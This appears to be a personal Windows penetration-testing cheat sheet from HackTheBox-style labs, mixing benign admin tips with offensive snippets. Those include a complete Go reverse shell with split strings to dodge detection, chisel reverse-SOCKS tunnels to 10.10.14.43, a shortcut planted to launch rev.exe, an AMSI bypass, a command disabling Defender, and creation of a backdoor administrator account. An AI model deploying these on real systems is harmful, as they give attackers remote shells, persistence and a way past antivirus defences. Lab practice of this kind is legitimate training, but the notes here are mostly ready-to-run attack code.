Windows

Add Program To Search Bar

1. Go to the folder your program is installed in, right click, select Send to > Desktop (Create shortcut)

2. Click Win+R and enter %ProgramData%\Microsoft\Windows\Start Menu to open the Start Menu folder in Windows Explorer

3. Move your new shortcut from the desktop to the Start Menu folder

4. If desired select the moved shortcut and press F2 to rename and remove the - Shortcut text

src

Cronjobs

• Start-Job

• Get-Job

• Receive-Job

• Stop-Job

• Remove-Job

Start-Job -ScriptBlock { & "./program.exe"; }

Start-Job -ScriptBlock { & "./chisel.exe" client 10.10.14.43:36000 R:socks; }

$job = Start-Job -ScriptBlock {
    & "./chisel.exe" client 10.10.14.43:36000 R:socks
}

Enable Web Dav

Source: HOW TO START A “TRIGGER START” WINDOWS SERVICE WITH POWERSHELL WITHOUT ELEVATION / ADMIN RIGHTS

$Source = @"
using System;
using System.Text;
using System.Security;
using System.Collections.Generic;
using System.Runtime.Versioning;
using Microsoft.Win32.SafeHandles;
using System.Runtime.InteropServices;
using System.Diagnostics.CodeAnalysis;
namespace JosL.WebClient {
  public static class Starter {
    [StructLayout(LayoutKind.Explicit, Size = 16)]
    public class EVENT_DESCRIPTOR {
      [FieldOffset(0)] ushort Id = 1;
      [FieldOffset(2)] byte Version = 0;
      [FieldOffset(3)] byte Channel = 0;
      [FieldOffset(4)] byte Level = 4;
      [FieldOffset(5)] byte Opcode = 0;
      [FieldOffset(6)] ushort Task = 0;
      [FieldOffset(8)] long Keyword = 0;
    }

    [StructLayout(LayoutKind.Explicit, Size = 16)]
    public struct EventData {
      [FieldOffset(0)]
      internal UInt64 DataPointer;
      [FieldOffset(8)]
      internal uint Size;
      [FieldOffset(12)]
      internal int Reserved;
    }

    public static void startService() {
      Guid webClientTrigger = new Guid(0x22B6D684, 0xFA63, 0x4578, 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7);

      long handle = 0;
      uint output = EventRegister(ref webClientTrigger, IntPtr.Zero, IntPtr.Zero, ref handle);

      bool success = false;

      if (output == 0) {
        EVENT_DESCRIPTOR desc = new EVENT_DESCRIPTOR();
        unsafe {
          uint writeOutput = EventWrite(handle, ref desc, 0, null);
          success = writeOutput == 0;
          EventUnregister(handle);
        }
      }
    }

    [DllImport("Advapi32.dll", SetLastError = true)]
    public static extern uint EventRegister(ref Guid guid, [Optional] IntPtr EnableCallback, [Optional] IntPtr CallbackContext, [In][Out] ref long RegHandle);

    [DllImport("Advapi32.dll", SetLastError = true)]
    public static extern unsafe uint EventWrite(long RegHandle, ref EVENT_DESCRIPTOR EventDescriptor, uint UserDataCount, EventData * UserData);

    [DllImport("Advapi32.dll", SetLastError = true)]
    public static extern uint EventUnregister(long RegHandle);
  }
}
"@
$compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
$compilerParameters.CompilerOptions="/unsafe"
Add-Type -TypeDefinition $Source -Language CSharp -CompilerParameters $compilerParameters
[JosL.WebClient.Starter]::startService()

Golang Reverse Shell

Author

Repo: https://github.com/gwillgues/Reverse-Shells.git Revshell.go: https://github.com/gwillgues/Reverse-Shells/blob/main/revshell.go

Code

// Author: https://github.com/gwillgues/Reverse-Shells/blob/main/revshell.go
package main

import (
	"os/exec"
	"os"
	"net"
	"runtime"
)

func main() {
	dst := os.Args[1]
	pnum := os.Args[2]
	connstring := dst + ":" + pnum
	prot := "tcp"
	netData, _ := net.Dial(prot, connstring)
	os := runtime.GOOS
	shell := exec.Command("/b" + "in" + "/b" + "ash")
	switch os {
		case "windows": shell = exec.Command("pow" + "ers" + "hell" + "." +  "e" + "xe")
		case "linux":   shell = exec.Command("/" + "b" + "in/" + "bas" + "h")
		case "darwin":  exec.Command("/b" + "in" + "/z" + "s" + "h")
	}
	shell.Stdin = netData
	shell.Stdout = netData
	shell.Stderr = netData
	shell.Run()
}

Build

Build for Windows:

GOOS=windows GOARCH=amd64 go build -o rev.exe rev.go

Build for Linux:

go build -ldflags="-s -w" -o rev rev.go

Get product versions

PS C:\xampp\htdocs\internal> wmic product get caption,version # Took like a minute to complete...
Caption                                                         Version
Office 16 Click-to-Run Extensibility Component                  16.0.17126.20132
Office 16 Click-to-Run Licensing Component                      16.0.17126.20132
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.32.31332     14.32.31332
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.32.31332  14.32.31332
LibreOffice 5.2.6.2                                             5.2.6.2
DefaultPackMSI                                                  4.6.2.0
VMware Tools                                                    12.0.6.20104755
...

Check if UAC is active

*Evil-WinRM* PS C:\Users\maya> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
	...
	EnableLUA    REG_DWORD    0x1
	...

Watch File Changes

$directory = "C:\Common Applications"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = $directory
$watcher.Filter = "*.lnk"
$watcher.IncludeSubdirectories = $true
$watcher.NotifyFilter = [System.IO.NotifyFilters]'FileName, LastAccess'
$accessLog = @{}
$action = {
    $filePath = $eventArgs.FullPath
    if ($accessLog.ContainsKey($filePath)) { $accessLog[$filePath]++ } else { $accessLog[$filePath] = 1 }
}
Register-ObjectEvent $watcher 'Changed' -Action $action
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Deleted' -Action $action
Register-ObjectEvent $watcher 'Renamed' -Action $action
$watcher.EnableRaisingEvents = $true
Write-Output "Monitoring .lnk file access in $directory for 2 minutes..."
Start-Sleep -Seconds 120
Write-Output "Total .lnk file accesses in 2 minutes:"
foreach ($file in $accessLog.Keys) {
    Write-Output "File: $file, Access Count: $($accessLog[$file])"
}
Unregister-Event -SourceIdentifier * -ErrorAction SilentlyContinue
$watcher.Dispose()

Create Shortcut (lnk)

$shortcutPath = "C:\Common Applications\Notepad.lnk"
$targetPath = "C:\Users\Public\rev.exe"
$wscript = New-Object -ComObject WScript.Shell
$shortcut = $wscript.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.Save()

Bypass AMSI

# Author: Axura  
# URL: https://4xura.com/ctf/htb-writeup-mist/#toc-head-4  
  
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'} 
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'} 
[IntPtr]$c = $b.GetValue($null) 
[Int32[]]$d = @(0xff) 
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

Disable Defender

Source: https://www.liberiangeek.net/2023/11/how-to-disable-windows-defender-using-powershell/

Set-MpPreference -DisableRealtimeMonitoring $true

Get flags (HTB)

ls $ENV:USERPROFILE -fil *.txt -rec | % { $_.FullName; echo " "; cat $_.FullName }

Create new admin user

net user <username> <password> /add
net localgroup administrators <username> /add
net localgroup "Remote Management Users" <username> /add

runas /user:<domain\username> "<command>"

net user letmein Password123$ /add && net localgroup administrators letmein /add && net localgroup "Remote Management Users" letmein /add
runas /user:letmein "whoami"

KRB_AP_ERR_SKEW (Clock skew too great)

nmap -sC {target} displays the following information:

Host script results:
...
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

Kerberos is time sensitive application and this median means a lot, without proper clock sync the service might not work as expected.

If you're Linux (Base metal) you can sync with ntpdate (Requires admin privs)

└─$ sudo ntpdate puppy.htb
2025-07-04 19:23:41.102394 (-0400) +25201.545990 +/- 0.040566 puppy.htb 10.10.11.70 s1 no-leap
CLOCK: time stepped by 25201.545990

However if you're inside Virtual Machine this won't work, but we have information about SKEW.

Calculate the hour (without nmap)

└─$ echo $(( 25201.545990 / 60 / 60 ))
7.0004294416666664

faketime command can be used to bypass this restrcition.

faketime -f +{SKEW}h {command}